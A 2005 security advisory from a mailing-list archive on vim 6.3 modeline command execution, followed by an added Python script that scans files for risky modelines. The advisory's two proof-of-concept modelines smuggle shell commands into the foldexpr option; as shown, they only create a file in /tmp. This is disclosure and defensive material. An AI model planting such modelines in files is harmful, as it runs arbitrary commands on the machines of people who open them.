Open Source and information security mailing list archives
Message-ID: <20050725153300.GC7380@sivokote.iziade.m$>
Date: Mon Jul 25 16:32:04 2005
From: guninski at guninski.com (Georgi Guninski)
Subject: Help poor children in Uganda

Georgi Guninski security advisory #75, 2005

Help poor children in Uganda

Systems affected:
vim 6.3

Date: 25 July 2005

Legal Notice:
This Advisory is Copyright (c) 2005 Georgi Guninski.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies, especially
the fact that Georgi Guninski is not liable for any damages caused
by direct or indirect use of the information or functionality provided
by this advisory or program. Georgi Guninski bears no responsibility for
content or misuse of this advisory or program or any derivatives thereof.

Description:
open file in vim 6.3 < 6.3.082 with modelines on, got owned.

Details:

--1--
vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`"): cannot be used in vulnerability databases.
-----
--2--
vim: foldmethod=expr:foldexpr=expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"): cannot be used in vulnerability databases.
-----

Workaround:
1. (preferred) Disable modelines via set modelines=0 and/or set nomodeline
in .vimrc
or
2. upgrade to 6.3.082 - patch available at:
ftp://ftp.vim.org/pub/vim/patches/6.3/

--
where do you want bill gates to go today?
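A defensive check to go with the workaround above, as an added example that is not part of the original advisory: it flags files whose modelines set expression-evaluated options such as foldexpr, looking only at the first and last five lines (Vim's default `modelines` value). The regular expressions approximating Vim's modeline grammar, the list of risky option names, and the names `scan` and `option_names` are assumptions of this example; the sample input is constructed.

```python
import re

# Modeline introducer: "vi:", "vim:", "Vim:" (optionally "vim>600:" style) or
# "ex:", at line start or after whitespace. Approximation of Vim's grammar.
MODELINE = re.compile(r'(?:^|\s)(?:vi|[vV]im(?:[<>=]?\d+)?|ex):\s*(.*)$')
# Options whose value Vim evaluates as an expression (assumed, heuristic list).
RISKY = re.compile(r'^(?:\w*expr|foldtext|fde|fdt|fex|inde|inex)$')

def option_names(body):
    """Yield option names from a modeline body, for both modeline syntaxes."""
    m = re.match(r'set?\s+(.*)', body)
    if m:   # "set" form: space-separated options, ended by an unescaped ':'
        parts = re.split(r'(?<!\\)\s+', re.split(r'(?<!\\):', m.group(1))[0])
    else:   # plain form: options separated by ':' or whitespace
        parts = re.split(r'(?<!\\)[:\s]+', body)
    for part in parts:
        name = re.match(r'[A-Za-z]+', part)
        if name:
            yield name.group(0)

def scan(text, modelines=5):
    """Return [(line_no, option)] for risky options found in the lines Vim
    would inspect for modelines: the first and last `modelines` lines."""
    lines = text.splitlines()
    head = range(min(modelines, len(lines)))
    tail = range(max(0, len(lines) - modelines), len(lines))
    hits = []
    for i in sorted(set(head) | set(tail)):
        m = MODELINE.search(lines[i])
        if m:
            hits += [(i + 1, n) for n in option_names(m.group(1))
                     if RISKY.match(n)]
    return hits

# Constructed sample: a harmless expression in the position the advisory uses.
SAMPLE = "#!/bin/sh\necho hi\n# vim: foldmethod=expr:foldexpr=1:\n"

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A hit means the file should be opened with modelines disabled or inspected in another viewer first; an empty result does not prove a file is safe, since the grammar here is simplified.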